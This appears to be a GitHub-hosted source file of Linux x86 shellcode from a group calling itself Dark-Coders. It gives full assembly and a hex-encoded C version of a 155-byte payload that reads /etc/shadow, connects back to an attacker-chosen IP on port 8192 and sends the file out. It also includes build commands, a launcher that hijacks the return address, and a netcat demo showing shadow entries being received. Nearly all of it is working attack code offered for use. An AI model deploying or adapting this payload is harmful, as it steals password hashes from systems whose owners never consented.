-
Notifications
You must be signed in to change notification settings - Fork 1
/
shellcode-207.c
executable file
·195 lines (188 loc) · 4.4 KB
/
shellcode-207.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
; (C)oDed by 0in
; Dark-Coders Group Productions
; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
; Contact: 0in[dot]email[at]gmail[dot]com
; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
; nasm -f elf shellcode.asm
; ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::
;The code (Assembler version):
Section .text
global _start
_start:
;open(file,O_RDONLY):
xor ebx,ebx
push byte 0x77 ;/etc/shadow
push word 0x6f64
push 0x6168732f
push 0x6374652f; ----------
mov ebx,esp ; first arg - filename
xor ax,ax
inc ax
inc ax
inc ax
inc ax
inc ax ; ax = 5 (O_RDONLY)
int 0x80
mov ebx,eax
;read(file,buff,1222):
xor ax,ax
inc ax
inc ax
inc ax ; syscall id = 3
mov dx,1222 ; size to read
push esp
mov ecx,[esp] ; memory
int 0x80
mov esi,eax ; file to ESI
;socket(PF_INET,SOCK_STREAM,IPPROTO_IP)
xor ebx,ebx
push ebx ;0 ; 3rd arg
inc ebx
push ebx ;1 ; 2nd arg
inc ebx
push ebx ;2 ; 1st arg
;socketcall()
mov ax,1666 ;--------------
sub ax,1564 ;--------------
xor bx,bx ; socket() call id
inc bx ;- - - - - - - - -
mov ecx,esp ; socket()
int 0x80 ; do it!
pop ebx; clear mem
;connect(eax,struct server,16)
;16 - sizeof struct sockaddr
mov edx, eax
xor ebx,ebx
xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP)
push ebx
mov bx,1666 ; definition of struct sockaddr
sub bx,1634 ;we cant stay 0x00 here (8192 PORT)
push bx
mov al, 2 ;
push ax
mov ecx, esp
mov al, 16
push eax
push ecx
push edx
mov al, 102
mov bx,1666
sub bx,1663 ;---------------------------------
mov ecx, esp
int 0x80 ; call connect
mov ebx,eax ; socket to ebx
; Ok! so...
; Lets write file to server and go down!
;write(socket,file,1222)
pop ebx
mov ax,1666
sub ax,1662
push esi
mov dx,16666
sub dx,15444
int 0x80
;exit(1) :
xor eax,eax ;----------
inc eax
mov ebx,eax ;----------
int 0x80 ; do it!
;C:
; #include <stdio.h>
; char shellcode[]="\x31\xdb"
; "\x6a\x77"
; "\x66\x68\x64\x6f"
; "\x68\x2f\x73\x68\x61"
; "\x68\x2f\x65\x74\x63"
; "\x89\xe3"
; "\x66\x31\xc0"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\xcd\x80"
; "\x89\xc3"
; "\x66\x31\xc0"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\xba\xc6\x04"
; "\x54"
; "\x8b\x0c\x24"
; "\xcd\x80"
; "\x89\xc6"
; "\x31\xdb"
; "\x53"
; "\x43"
; "\x53"
; "\x43"
; "\x53"
; "\x66\xb8\x82\x06"
; "\x66\x2d\x1c\x06"
; "\x66\x31\xdb"
; "\x66\x43"
; "\x89\xe1"
; "\xcd\x80"
; "\x5b"
; "\x89\xc2"
; "\x31\xdb"
; "\x53"
; "\x66\xbb\x82\x06"
; "\x66\x81\xeb\x62\x06"
; "\x66\x53"
; "\xb0\x02"
; "\x66\x50"
; "\x89\xe1"
; "\xb0\x10"
; "\x50"
; "\x51"
; "\x52"
; "\xb0\x66"
; "\x66\xbb\x82\x06"
; "\x66\x81\xeb\x7f\x06"
; "\x89\xe1"
; "\xcd\x80"
; "\x89\xc3"
; "\x5b"
; "\x66\xb8\x82\x06"
; "\x66\x2d\x7e\x06"
; "\x56"
; "\x66\xba\x1a\x41"
; "\x66\x81\xea\x54\x3c"
; "\xcd\x80"
; "\x31\xc0"
; "\x40"
; "\x89\xc3"
; "\xcd\x80";
; int main(int argc, char **argv)
; {
; int *ret;
; ret = (int *)&ret + 2;
; (*ret) = (int) shellcode;
; }